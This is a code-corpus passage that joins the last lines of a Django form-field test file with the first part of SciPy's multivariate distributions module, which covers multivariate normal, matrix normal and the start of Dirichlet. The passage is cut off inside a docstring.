self.assertFalse(f._has_changed(['11/01/2012', '09:18:15'], ['11/01/2012', '09:18:15']))
self.assertTrue(f._has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['2008-05-06', '12:40:00']))
self.assertFalse(f._has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:40']))
self.assertTrue(f._has_changed(datetime.datetime(2008, 5, 6, 12, 40, 00), ['06/05/2008', '12:41']))
|
dex4er/django
|
tests/forms_tests/tests/test_fields.py
|
Python
|
bsd-3-clause
| 69,654
|
#
# Author: Joris Vankerschaver 2013
#
from __future__ import division, print_function, absolute_import
import numpy as np
import scipy.linalg
from scipy.misc import doccer
from scipy.special import gammaln, psi, multigammaln
from scipy._lib._util import check_random_state
__all__ = ['multivariate_normal',
'matrix_normal',
'dirichlet',
'wishart',
'invwishart',
'special_ortho_group',
'ortho_group']
_LOG_2PI = np.log(2 * np.pi)
_LOG_2 = np.log(2)
_LOG_PI = np.log(np.pi)
_doc_random_state = """\
random_state : None or int or np.random.RandomState instance, optional
If int or RandomState, use it for drawing the random variates.
If None (or np.random), the global np.random state is used.
Default is None.
"""
def _squeeze_output(out):
"""
Remove single-dimensional entries from array and convert to scalar,
if necessary.
"""
out = out.squeeze()
if out.ndim == 0:
out = out[()]
return out
def _eigvalsh_to_eps(spectrum, cond=None, rcond=None):
"""
Determine which eigenvalues are "small" given the spectrum.
This is for compatibility across various linear algebra functions
that should agree about whether or not a Hermitian matrix is numerically
singular and what is its numerical matrix rank.
This is designed to be compatible with scipy.linalg.pinvh.
Parameters
----------
spectrum : 1d ndarray
Array of eigenvalues of a Hermitian matrix.
cond, rcond : float, optional
Cutoff for small eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are
considered zero.
If None or -1, suitable machine precision is used.
Returns
-------
eps : float
Magnitude cutoff for numerical negligibility.
"""
if rcond is not None:
cond = rcond
if cond in [None, -1]:
t = spectrum.dtype.char.lower()
factor = {'f': 1E3, 'd': 1E6}
cond = factor[t] * np.finfo(t).eps
eps = cond * np.max(abs(spectrum))
return eps
def _pinv_1d(v, eps=1e-5):
"""
A helper function for computing the pseudoinverse.
Parameters
----------
v : iterable of numbers
This may be thought of as a vector of eigenvalues or singular values.
eps : float
Values with magnitude no greater than eps are considered negligible.
Returns
-------
v_pinv : 1d float ndarray
A vector of pseudo-inverted numbers.
"""
return np.array([0 if abs(x) <= eps else 1/x for x in v], dtype=float)
class _PSD(object):
"""
Compute coordinated functions of a symmetric positive semidefinite matrix.
This class addresses two issues. Firstly it allows the pseudoinverse,
the logarithm of the pseudo-determinant, and the rank of the matrix
to be computed using one call to eigh instead of three.
Secondly it allows these functions to be computed in a way
that gives mutually compatible results.
All of the functions are computed with a common understanding as to
which of the eigenvalues are to be considered negligibly small.
The functions are designed to coordinate with scipy.linalg.pinvh()
but not necessarily with np.linalg.det() or with np.linalg.matrix_rank().
Parameters
----------
M : array_like
Symmetric positive semidefinite matrix (2-D).
cond, rcond : float, optional
Cutoff for small eigenvalues.
Singular values smaller than rcond * largest_eigenvalue are
considered zero.
If None or -1, suitable machine precision is used.
lower : bool, optional
Whether the pertinent array data is taken from the lower
or upper triangle of M. (Default: lower)
check_finite : bool, optional
Whether to check that the input matrices contain only finite
numbers. Disabling may give a performance gain, but may result
in problems (crashes, non-termination) if the inputs do contain
infinities or NaNs.
allow_singular : bool, optional
Whether to allow a singular matrix. (Default: True)
Notes
-----
The arguments are similar to those of scipy.linalg.pinvh().
"""
def __init__(self, M, cond=None, rcond=None, lower=True,
check_finite=True, allow_singular=True):
# Compute the symmetric eigendecomposition.
# Note that eigh takes care of array conversion, chkfinite,
# and assertion that the matrix is square.
s, u = scipy.linalg.eigh(M, lower=lower, check_finite=check_finite)
eps = _eigvalsh_to_eps(s, cond, rcond)
if np.min(s) < -eps:
raise ValueError('the input matrix must be positive semidefinite')
d = s[s > eps]
if len(d) < len(s) and not allow_singular:
raise np.linalg.LinAlgError('singular matrix')
s_pinv = _pinv_1d(s, eps)
U = np.multiply(u, np.sqrt(s_pinv))
# Initialize the eagerly precomputed attributes.
self.rank = len(d)
self.U = U
self.log_pdet = np.sum(np.log(d))
# Initialize an attribute to be lazily computed.
self._pinv = None
@property
def pinv(self):
if self._pinv is None:
self._pinv = np.dot(self.U, self.U.T)
return self._pinv
class multi_rv_generic(object):
"""
Class which encapsulates common functionality between all multivariate
distributions.
"""
def __init__(self, seed=None):
super(multi_rv_generic, self).__init__()
self._random_state = check_random_state(seed)
@property
def random_state(self):
""" Get or set the RandomState object for generating random variates.
This can be either None or an existing RandomState object.
If None (or np.random), use the RandomState singleton used by np.random.
If already a RandomState instance, use it.
If an int, use a new RandomState instance seeded with seed.
"""
return self._random_state
@random_state.setter
def random_state(self, seed):
self._random_state = check_random_state(seed)
def _get_random_state(self, random_state):
if random_state is not None:
return check_random_state(random_state)
else:
return self._random_state
class multi_rv_frozen(object):
"""
Class which encapsulates common functionality between all frozen
multivariate distributions.
"""
@property
def random_state(self):
return self._dist._random_state
@random_state.setter
def random_state(self, seed):
self._dist._random_state = check_random_state(seed)
_mvn_doc_default_callparams = """\
mean : array_like, optional
Mean of the distribution (default zero)
cov : array_like, optional
Covariance matrix of the distribution (default one)
allow_singular : bool, optional
Whether to allow a singular covariance matrix. (Default: False)
"""
_mvn_doc_callparams_note = \
"""Setting the parameter `mean` to `None` is equivalent to having `mean`
be the zero-vector. The parameter `cov` can be a scalar, in which case
the covariance matrix is the identity times that value, a vector of
diagonal entries for the covariance matrix, or a two-dimensional
array_like.
"""
_mvn_doc_frozen_callparams = ""
_mvn_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
mvn_docdict_params = {
'_mvn_doc_default_callparams': _mvn_doc_default_callparams,
'_mvn_doc_callparams_note': _mvn_doc_callparams_note,
'_doc_random_state': _doc_random_state
}
mvn_docdict_noparams = {
'_mvn_doc_default_callparams': _mvn_doc_frozen_callparams,
'_mvn_doc_callparams_note': _mvn_doc_frozen_callparams_note,
'_doc_random_state': _doc_random_state
}
class multivariate_normal_gen(multi_rv_generic):
r"""
A multivariate normal random variable.
The `mean` keyword specifies the mean. The `cov` keyword specifies the
covariance matrix.
Methods
-------
``pdf(x, mean=None, cov=1, allow_singular=False)``
Probability density function.
``logpdf(x, mean=None, cov=1, allow_singular=False)``
Log of the probability density function.
``rvs(mean=None, cov=1, size=1, random_state=None)``
Draw random samples from a multivariate normal distribution.
``entropy()``
Compute the differential entropy of the multivariate normal.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_mvn_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the mean
and covariance parameters, returning a "frozen" multivariate normal
random variable:
rv = multivariate_normal(mean=None, cov=1, allow_singular=False)
- Frozen object with the same methods but holding the given
mean and covariance fixed.
Notes
-----
%(_mvn_doc_callparams_note)s
The covariance matrix `cov` must be a (symmetric) positive
semi-definite matrix. The determinant and inverse of `cov` are computed
as the pseudo-determinant and pseudo-inverse, respectively, so
that `cov` does not need to have full rank.
The probability density function for `multivariate_normal` is
.. math::
f(x) = \frac{1}{\sqrt{(2 \pi)^k \det \Sigma}}
\exp\left( -\frac{1}{2} (x - \mu)^T \Sigma^{-1} (x - \mu) \right),
where :math:`\mu` is the mean, :math:`\Sigma` the covariance matrix,
and :math:`k` is the dimension of the space where :math:`x` takes values.
.. versionadded:: 0.14.0
Examples
--------
>>> import matplotlib.pyplot as plt
>>> from scipy.stats import multivariate_normal
>>> x = np.linspace(0, 5, 10, endpoint=False)
>>> y = multivariate_normal.pdf(x, mean=2.5, cov=0.5); y
array([ 0.00108914, 0.01033349, 0.05946514, 0.20755375, 0.43939129,
0.56418958, 0.43939129, 0.20755375, 0.05946514, 0.01033349])
>>> fig1 = plt.figure()
>>> ax = fig1.add_subplot(111)
>>> ax.plot(x, y)
The input quantiles can be any shape of array, as long as the last
axis labels the components. This allows us for instance to
display the frozen pdf for a non-isotropic random variable in 2D as
follows:
>>> x, y = np.mgrid[-1:1:.01, -1:1:.01]
>>> pos = np.dstack((x, y))
>>> rv = multivariate_normal([0.5, -0.2], [[2.0, 0.3], [0.3, 0.5]])
>>> fig2 = plt.figure()
>>> ax2 = fig2.add_subplot(111)
>>> ax2.contourf(x, y, rv.pdf(pos))
"""
def __init__(self, seed=None):
super(multivariate_normal_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, mvn_docdict_params)
def __call__(self, mean=None, cov=1, allow_singular=False, seed=None):
"""
Create a frozen multivariate normal distribution.
See `multivariate_normal_frozen` for more information.
"""
return multivariate_normal_frozen(mean, cov,
allow_singular=allow_singular,
seed=seed)
def _process_parameters(self, dim, mean, cov):
"""
Infer dimensionality from mean or covariance matrix, ensure that
mean and covariance are full vector resp. matrix.
"""
# Try to infer dimensionality
if dim is None:
if mean is None:
if cov is None:
dim = 1
else:
cov = np.asarray(cov, dtype=float)
if cov.ndim < 2:
dim = 1
else:
dim = cov.shape[0]
else:
mean = np.asarray(mean, dtype=float)
dim = mean.size
else:
if not np.isscalar(dim):
raise ValueError("Dimension of random variable must be a scalar.")
# Check input sizes and return full arrays for mean and cov if necessary
if mean is None:
mean = np.zeros(dim)
mean = np.asarray(mean, dtype=float)
if cov is None:
cov = 1.0
cov = np.asarray(cov, dtype=float)
if dim == 1:
mean.shape = (1,)
cov.shape = (1, 1)
if mean.ndim != 1 or mean.shape[0] != dim:
raise ValueError("Array 'mean' must be a vector of length %d." % dim)
if cov.ndim == 0:
cov = cov * np.eye(dim)
elif cov.ndim == 1:
cov = np.diag(cov)
elif cov.ndim == 2 and cov.shape != (dim, dim):
rows, cols = cov.shape
if rows != cols:
msg = ("Array 'cov' must be square if it is two dimensional,"
" but cov.shape = %s." % str(cov.shape))
else:
msg = ("Dimension mismatch: array 'cov' is of shape %s,"
" but 'mean' is a vector of length %d.")
msg = msg % (str(cov.shape), len(mean))
raise ValueError(msg)
elif cov.ndim > 2:
raise ValueError("Array 'cov' must be at most two-dimensional,"
" but cov.ndim = %d" % cov.ndim)
return dim, mean, cov
def _process_quantiles(self, x, dim):
"""
Adjust quantiles array so that last axis labels the components of
each data point.
"""
x = np.asarray(x, dtype=float)
if x.ndim == 0:
x = x[np.newaxis]
elif x.ndim == 1:
if dim == 1:
x = x[:, np.newaxis]
else:
x = x[np.newaxis, :]
return x
def _logpdf(self, x, mean, prec_U, log_det_cov, rank):
"""
Parameters
----------
x : ndarray
Points at which to evaluate the log of the probability
density function
mean : ndarray
Mean of the distribution
prec_U : ndarray
A decomposition such that np.dot(prec_U, prec_U.T)
is the precision matrix, i.e. inverse of the covariance matrix.
log_det_cov : float
Logarithm of the determinant of the covariance matrix
rank : int
Rank of the covariance matrix.
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
dev = x - mean
maha = np.sum(np.square(np.dot(dev, prec_U)), axis=-1)
return -0.5 * (rank * _LOG_2PI + log_det_cov + maha)
def logpdf(self, x, mean, cov, allow_singular=False):
"""
Log of the multivariate normal probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_mvn_doc_default_callparams)s
Returns
-------
pdf : ndarray
Log of the probability density function evaluated at `x`
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
x = self._process_quantiles(x, dim)
psd = _PSD(cov, allow_singular=allow_singular)
out = self._logpdf(x, mean, psd.U, psd.log_pdet, psd.rank)
return _squeeze_output(out)
def pdf(self, x, mean, cov, allow_singular=False):
"""
Multivariate normal probability density function.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_mvn_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `x`
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
x = self._process_quantiles(x, dim)
psd = _PSD(cov, allow_singular=allow_singular)
out = np.exp(self._logpdf(x, mean, psd.U, psd.log_pdet, psd.rank))
return _squeeze_output(out)
def rvs(self, mean=None, cov=1, size=1, random_state=None):
"""
Draw random samples from a multivariate normal distribution.
Parameters
----------
%(_mvn_doc_default_callparams)s
size : integer, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray or scalar
Random variates of size (`size`, `N`), where `N` is the
dimension of the random variable.
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
random_state = self._get_random_state(random_state)
out = random_state.multivariate_normal(mean, cov, size)
return _squeeze_output(out)
def entropy(self, mean=None, cov=1):
"""
Compute the differential entropy of the multivariate normal.
Parameters
----------
%(_mvn_doc_default_callparams)s
Returns
-------
h : scalar
Entropy of the multivariate normal distribution
Notes
-----
%(_mvn_doc_callparams_note)s
"""
dim, mean, cov = self._process_parameters(None, mean, cov)
_, logdet = np.linalg.slogdet(2 * np.pi * np.e * cov)
return 0.5 * logdet
multivariate_normal = multivariate_normal_gen()
class multivariate_normal_frozen(multi_rv_frozen):
def __init__(self, mean=None, cov=1, allow_singular=False, seed=None):
"""
Create a frozen multivariate normal distribution.
Parameters
----------
mean : array_like, optional
Mean of the distribution (default zero)
cov : array_like, optional
Covariance matrix of the distribution (default one)
allow_singular : bool, optional
If this flag is True then tolerate a singular
covariance matrix (default False).
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
Examples
--------
When called with the default parameters, this will create a 1D random
variable with mean 0 and covariance 1:
>>> from scipy.stats import multivariate_normal
>>> r = multivariate_normal()
>>> r.mean
array([ 0.])
>>> r.cov
array([[1.]])
"""
self._dist = multivariate_normal_gen(seed)
self.dim, self.mean, self.cov = self._dist._process_parameters(
None, mean, cov)
self.cov_info = _PSD(self.cov, allow_singular=allow_singular)
def logpdf(self, x):
x = self._dist._process_quantiles(x, self.dim)
out = self._dist._logpdf(x, self.mean, self.cov_info.U,
self.cov_info.log_pdet, self.cov_info.rank)
return _squeeze_output(out)
def pdf(self, x):
return np.exp(self.logpdf(x))
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.mean, self.cov, size, random_state)
def entropy(self):
"""
Computes the differential entropy of the multivariate normal.
Returns
-------
h : scalar
Entropy of the multivariate normal distribution
"""
log_pdet = self.cov_info.log_pdet
rank = self.cov_info.rank
return 0.5 * (rank * (_LOG_2PI + 1) + log_pdet)
# Set frozen generator docstrings from corresponding docstrings in
# multivariate_normal_gen and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'rvs']:
method = multivariate_normal_gen.__dict__[name]
method_frozen = multivariate_normal_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(method.__doc__, mvn_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, mvn_docdict_params)
_matnorm_doc_default_callparams = """\
mean : array_like, optional
Mean of the distribution (default: `None`)
rowcov : array_like, optional
Among-row covariance matrix of the distribution (default: `1`)
colcov : array_like, optional
Among-column covariance matrix of the distribution (default: `1`)
"""
_matnorm_doc_callparams_note = \
"""If `mean` is set to `None` then a matrix of zeros is used for the mean.
The dimensions of this matrix are inferred from the shape of `rowcov` and
`colcov`, if these are provided, or set to `1` if ambiguous.
`rowcov` and `colcov` can be two-dimensional array_likes specifying the
covariance matrices directly. Alternatively, a one-dimensional array will
be be interpreted as the entries of a diagonal matrix, and a scalar or
zero-dimensional array will be interpreted as this value times the
identity matrix.
"""
_matnorm_doc_frozen_callparams = ""
_matnorm_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
matnorm_docdict_params = {
'_matnorm_doc_default_callparams': _matnorm_doc_default_callparams,
'_matnorm_doc_callparams_note': _matnorm_doc_callparams_note,
'_doc_random_state': _doc_random_state
}
matnorm_docdict_noparams = {
'_matnorm_doc_default_callparams': _matnorm_doc_frozen_callparams,
'_matnorm_doc_callparams_note': _matnorm_doc_frozen_callparams_note,
'_doc_random_state': _doc_random_state
}
class matrix_normal_gen(multi_rv_generic):
r"""
A matrix normal random variable.
The `mean` keyword specifies the mean. The `rowcov` keyword specifies the
among-row covariance matrix. The 'colcov' keyword specifies the
among-column covariance matrix.
Methods
-------
``pdf(X, mean=None, rowcov=1, colcov=1)``
Probability density function.
``logpdf(X, mean=None, rowcov=1, colcov=1)``
Log of the probability density function.
``rvs(mean=None, rowcov=1, colcov=1, size=1, random_state=None)``
Draw random samples.
Parameters
----------
X : array_like
Quantiles, with the last two axes of `X` denoting the components.
%(_matnorm_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix the mean
and covariance parameters, returning a "frozen" matrix normal
random variable:
rv = matrix_normal(mean=None, rowcov=1, colcov=1)
- Frozen object with the same methods but holding the given
mean and covariance fixed.
Notes
-----
%(_matnorm_doc_callparams_note)s
The covariance matrices specified by `rowcov` and `colcov` must be
(symmetric) positive definite. If the samples in `X` are
:math:`m \times n`, then `rowcov` must be :math:`m \times m` and
`colcov` must be :math:`n \times n`. `mean` must be the same shape as `X`.
The probability density function for `matrix_normal` is
.. math::
f(X) = (2 \pi)^{-\frac{mn}{2}}|U|^{-\frac{n}{2}} |V|^{-\frac{m}{2}}
\exp\left( -\frac{1}{2} \mathrm{Tr}\left[ U^{-1} (X-M) V^{-1}
(X-M)^T \right] \right),
where :math:`M` is the mean, :math:`U` the among-row covariance matrix,
:math:`V` the among-column covariance matrix.
The `allow_singular` behaviour of the `multivariate_normal`
distribution is not currently supported. Covariance matrices must be
full rank.
The `matrix_normal` distribution is closely related to the
`multivariate_normal` distribution. Specifically, :math:`\mathrm{Vec}(X)`
(the vector formed by concatenating the columns of :math:`X`) has a
multivariate normal distribution with mean :math:`\mathrm{Vec}(M)`
and covariance :math:`V \otimes U` (where :math:`\otimes` is the Kronecker
product). Sampling and pdf evaluation are
:math:`\mathcal{O}(m^3 + n^3 + m^2 n + m n^2)` for the matrix normal, but
:math:`\mathcal{O}(m^3 n^3)` for the equivalent multivariate normal,
making this equivalent form algorithmically inefficient.
.. versionadded:: 0.17.0
Examples
--------
>>> from scipy.stats import matrix_normal
>>> M = np.arange(6).reshape(3,2); M
array([[0, 1],
[2, 3],
[4, 5]])
>>> U = np.diag([1,2,3]); U
array([[1, 0, 0],
[0, 2, 0],
[0, 0, 3]])
>>> V = 0.3*np.identity(2); V
array([[ 0.3, 0. ],
[ 0. , 0.3]])
>>> X = M + 0.1; X
array([[ 0.1, 1.1],
[ 2.1, 3.1],
[ 4.1, 5.1]])
>>> matrix_normal.pdf(X, mean=M, rowcov=U, colcov=V)
0.023410202050005054
>>> # Equivalent multivariate normal
>>> from scipy.stats import multivariate_normal
>>> vectorised_X = X.T.flatten()
>>> equiv_mean = M.T.flatten()
>>> equiv_cov = np.kron(V,U)
>>> multivariate_normal.pdf(vectorised_X, mean=equiv_mean, cov=equiv_cov)
0.023410202050005054
"""
def __init__(self, seed=None):
super(matrix_normal_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__, matnorm_docdict_params)
def __call__(self, mean=None, rowcov=1, colcov=1, seed=None):
"""
Create a frozen matrix normal distribution.
See `matrix_normal_frozen` for more information.
"""
return matrix_normal_frozen(mean, rowcov, colcov, seed=seed)
def _process_parameters(self, mean, rowcov, colcov):
"""
Infer dimensionality from mean or covariance matrices. Handle
defaults. Ensure compatible dimensions.
"""
# Process mean
if mean is not None:
mean = np.asarray(mean, dtype=float)
meanshape = mean.shape
if len(meanshape) != 2:
raise ValueError("Array `mean` must be two dimensional.")
if np.any(meanshape == 0):
raise ValueError("Array `mean` has invalid shape.")
# Process among-row covariance
rowcov = np.asarray(rowcov, dtype=float)
if rowcov.ndim == 0:
if mean is not None:
rowcov = rowcov * np.identity(meanshape[0])
else:
rowcov = rowcov * np.identity(1)
elif rowcov.ndim == 1:
rowcov = np.diag(rowcov)
rowshape = rowcov.shape
if len(rowshape) != 2:
raise ValueError("`rowcov` must be a scalar or a 2D array.")
if rowshape[0] != rowshape[1]:
raise ValueError("Array `rowcov` must be square.")
if rowshape[0] == 0:
raise ValueError("Array `rowcov` has invalid shape.")
numrows = rowshape[0]
# Process among-column covariance
colcov = np.asarray(colcov, dtype=float)
if colcov.ndim == 0:
if mean is not None:
colcov = colcov * np.identity(meanshape[1])
else:
colcov = colcov * np.identity(1)
elif colcov.ndim == 1:
colcov = np.diag(colcov)
colshape = colcov.shape
if len(colshape) != 2:
raise ValueError("`colcov` must be a scalar or a 2D array.")
if colshape[0] != colshape[1]:
raise ValueError("Array `colcov` must be square.")
if colshape[0] == 0:
raise ValueError("Array `colcov` has invalid shape.")
numcols = colshape[0]
# Ensure mean and covariances compatible
if mean is not None:
if meanshape[0] != numrows:
raise ValueError("Arrays `mean` and `rowcov` must have the"
"same number of rows.")
if meanshape[1] != numcols:
raise ValueError("Arrays `mean` and `colcov` must have the"
"same number of columns.")
else:
mean = np.zeros((numrows,numcols))
dims = (numrows, numcols)
return dims, mean, rowcov, colcov
def _process_quantiles(self, X, dims):
"""
Adjust quantiles array so that last two axes labels the components of
each data point.
"""
X = np.asarray(X, dtype=float)
if X.ndim == 2:
X = X[np.newaxis, :]
if X.shape[-2:] != dims:
raise ValueError("The shape of array `X` is not compatible "
"with the distribution parameters.")
return X
def _logpdf(self, dims, X, mean, row_prec_rt, log_det_rowcov,
col_prec_rt, log_det_colcov):
"""
Parameters
----------
dims : tuple
Dimensions of the matrix variates
X : ndarray
Points at which to evaluate the log of the probability
density function
mean : ndarray
Mean of the distribution
row_prec_rt : ndarray
A decomposition such that np.dot(row_prec_rt, row_prec_rt.T)
is the inverse of the among-row covariance matrix
log_det_rowcov : float
Logarithm of the determinant of the among-row covariance matrix
col_prec_rt : ndarray
A decomposition such that np.dot(col_prec_rt, col_prec_rt.T)
is the inverse of the among-column covariance matrix
log_det_colcov : float
Logarithm of the determinant of the among-column covariance matrix
Notes
-----
As this function does no argument checking, it should not be
called directly; use 'logpdf' instead.
"""
numrows, numcols = dims
roll_dev = np.rollaxis(X-mean, axis=-1, start=0)
scale_dev = np.tensordot(col_prec_rt.T,
np.dot(roll_dev, row_prec_rt), 1)
maha = np.sum(np.sum(np.square(scale_dev), axis=-1), axis=0)
return -0.5 * (numrows*numcols*_LOG_2PI + numcols*log_det_rowcov
+ numrows*log_det_colcov + maha)
def logpdf(self, X, mean=None, rowcov=1, colcov=1):
"""
Log of the matrix normal probability density function.
Parameters
----------
X : array_like
Quantiles, with the last two axes of `X` denoting the components.
%(_matnorm_doc_default_callparams)s
Returns
-------
logpdf : ndarray
Log of the probability density function evaluated at `X`
Notes
-----
%(_matnorm_doc_callparams_note)s
"""
dims, mean, rowcov, colcov = self._process_parameters(mean, rowcov,
colcov)
X = self._process_quantiles(X, dims)
rowpsd = _PSD(rowcov, allow_singular=False)
colpsd = _PSD(colcov, allow_singular=False)
out = self._logpdf(dims, X, mean, rowpsd.U, rowpsd.log_pdet, colpsd.U,
colpsd.log_pdet)
return _squeeze_output(out)
def pdf(self, X, mean=None, rowcov=1, colcov=1):
"""
Matrix normal probability density function.
Parameters
----------
X : array_like
Quantiles, with the last two axes of `X` denoting the components.
%(_matnorm_doc_default_callparams)s
Returns
-------
pdf : ndarray
Probability density function evaluated at `X`
Notes
-----
%(_matnorm_doc_callparams_note)s
"""
return np.exp(self.logpdf(X, mean, rowcov, colcov))
def rvs(self, mean=None, rowcov=1, colcov=1, size=1, random_state=None):
"""
Draw random samples from a matrix normal distribution.
Parameters
----------
%(_matnorm_doc_default_callparams)s
size : integer, optional
Number of samples to draw (default 1).
%(_doc_random_state)s
Returns
-------
rvs : ndarray or scalar
Random variates of size (`size`, `dims`), where `dims` is the
dimension of the random matrices.
Notes
-----
%(_matnorm_doc_callparams_note)s
"""
size = int(size)
dims, mean, rowcov, colcov = self._process_parameters(mean, rowcov,
colcov)
rowchol = scipy.linalg.cholesky(rowcov, lower=True)
colchol = scipy.linalg.cholesky(colcov, lower=True)
random_state = self._get_random_state(random_state)
std_norm = random_state.standard_normal(size=(dims[1],size,dims[0]))
roll_rvs = np.tensordot(colchol, np.dot(std_norm, rowchol.T), 1)
out = np.rollaxis(roll_rvs.T, axis=1, start=0) + mean[np.newaxis,:,:]
if size == 1:
#out = np.squeeze(out, axis=0)
out = out.reshape(mean.shape)
return out
matrix_normal = matrix_normal_gen()
class matrix_normal_frozen(multi_rv_frozen):
def __init__(self, mean=None, rowcov=1, colcov=1, seed=None):
"""
Create a frozen matrix normal distribution.
Parameters
----------
%(_matnorm_doc_default_callparams)s
seed : None or int or np.random.RandomState instance, optional
If int or RandomState, use it for drawing the random variates.
If None (or np.random), the global np.random state is used.
Default is None.
Examples
--------
>>> from scipy.stats import matrix_normal
>>> distn = matrix_normal(mean=np.zeros((3,3)))
>>> X = distn.rvs(); X
array([[-0.02976962, 0.93339138, -0.09663178],
[ 0.67405524, 0.28250467, -0.93308929],
[-0.31144782, 0.74535536, 1.30412916]])
>>> distn.pdf(X)
2.5160642368346784e-05
>>> distn.logpdf(X)
-10.590229595124615
"""
self._dist = matrix_normal_gen(seed)
self.dims, self.mean, self.rowcov, self.colcov = \
self._dist._process_parameters(mean, rowcov, colcov)
self.rowpsd = _PSD(self.rowcov, allow_singular=False)
self.colpsd = _PSD(self.colcov, allow_singular=False)
def logpdf(self, X):
X = self._dist._process_quantiles(X, self.dims)
out = self._dist._logpdf(self.dims, X, self.mean, self.rowpsd.U,
self.rowpsd.log_pdet, self.colpsd.U,
self.colpsd.log_pdet)
return _squeeze_output(out)
def pdf(self, X):
return np.exp(self.logpdf(X))
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.mean, self.rowcov, self.colcov, size,
random_state)
# Set frozen generator docstrings from corresponding docstrings in
# matrix_normal_gen and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'rvs']:
method = matrix_normal_gen.__dict__[name]
method_frozen = matrix_normal_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(method.__doc__, matnorm_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, matnorm_docdict_params)
_dirichlet_doc_default_callparams = """\
alpha : array_like
The concentration parameters. The number of entries determines the
dimensionality of the distribution.
"""
_dirichlet_doc_frozen_callparams = ""
_dirichlet_doc_frozen_callparams_note = \
"""See class definition for a detailed description of parameters."""
dirichlet_docdict_params = {
'_dirichlet_doc_default_callparams': _dirichlet_doc_default_callparams,
'_doc_random_state': _doc_random_state
}
dirichlet_docdict_noparams = {
'_dirichlet_doc_default_callparams': _dirichlet_doc_frozen_callparams,
'_doc_random_state': _doc_random_state
}
def _dirichlet_check_parameters(alpha):
alpha = np.asarray(alpha)
if np.min(alpha) <= 0:
raise ValueError("All parameters must be greater than 0")
elif alpha.ndim != 1:
raise ValueError("Parameter vector 'a' must be one dimensional, "
"but a.shape = %s." % (alpha.shape, ))
return alpha
def _dirichlet_check_input(alpha, x):
x = np.asarray(x)
if x.shape[0] + 1 != alpha.shape[0] and x.shape[0] != alpha.shape[0]:
raise ValueError("Vector 'x' must have either the same number "
"of entries as, or one entry fewer than, "
"parameter vector 'a', but alpha.shape = %s "
"and x.shape = %s." % (alpha.shape, x.shape))
if x.shape[0] != alpha.shape[0]:
xk = np.array([1 - np.sum(x, 0)])
if xk.ndim == 1:
x = np.append(x, xk)
elif xk.ndim == 2:
x = np.vstack((x, xk))
else:
raise ValueError("The input must be one dimensional or a two "
"dimensional matrix containing the entries.")
if np.min(x) <= 0:
raise ValueError("Each entry in 'x' must be greater than zero.")
if np.max(x) > 1:
raise ValueError("Each entry in 'x' must be smaller or equal one.")
if (np.abs(np.sum(x, 0) - 1.0) > 10e-10).any():
raise ValueError("The input vector 'x' must lie within the normal "
"simplex. but np.sum(x, 0) = %s." % np.sum(x, 0))
return x
def _lnB(alpha):
r"""
Internal helper function to compute the log of the useful quotient
.. math::
B(\alpha) = \frac{\prod_{i=1}{K}\Gamma(\alpha_i)}{\Gamma\left(\sum_{i=1}^{K}\alpha_i\right)}
Parameters
----------
%(_dirichlet_doc_default_callparams)s
Returns
-------
B : scalar
Helper quotient, internal use only
"""
return np.sum(gammaln(alpha)) - gammaln(np.sum(alpha))
class dirichlet_gen(multi_rv_generic):
r"""
A Dirichlet random variable.
The `alpha` keyword specifies the concentration parameters of the
distribution.
.. versionadded:: 0.15.0
Methods
-------
``pdf(x, alpha)``
Probability density function.
``logpdf(x, alpha)``
Log of the probability density function.
``rvs(alpha, size=1, random_state=None)``
Draw random samples from a Dirichlet distribution.
``mean(alpha)``
The mean of the Dirichlet distribution
``var(alpha)``
The variance of the Dirichlet distribution
``entropy(alpha)``
Compute the differential entropy of the multivariate normal.
Parameters
----------
x : array_like
Quantiles, with the last axis of `x` denoting the components.
%(_dirichlet_doc_default_callparams)s
%(_doc_random_state)s
Alternatively, the object may be called (as a function) to fix
concentration parameters, returning a "frozen" Dirichlet
random variable:
rv = dirichlet(alpha)
- Frozen object with the same methods but holding the given
concentration parameters fixed.
Notes
-----
Each :math:`\alpha` entry must be positive. The distribution has only
support on the simplex defined by
.. math::
\sum_{i=1}^{K} x_i \le 1
The probability density function for `dirichlet` is
.. math::
f(x) = \frac{1}{\mathrm{B}(\boldsymbol\alpha)} \prod_{i=1}^K x_i^{\alpha_i - 1}
where
.. math::
\mathrm{B}(\boldsymbol\alpha) = \frac{\prod_{i=1}^K \Gamma(\alpha_i)}
{\Gamma\bigl(\sum_{i=1}^K \alpha_i\bigr)}
and :math:`\boldsymbol\alpha=(\alpha_1,\ldots,\alpha_K)`, the
concentration parameters and :math:`K` is the dimension of the space
where :math:`x` takes values.
Note that the dirichlet interface is somewhat inconsistent.
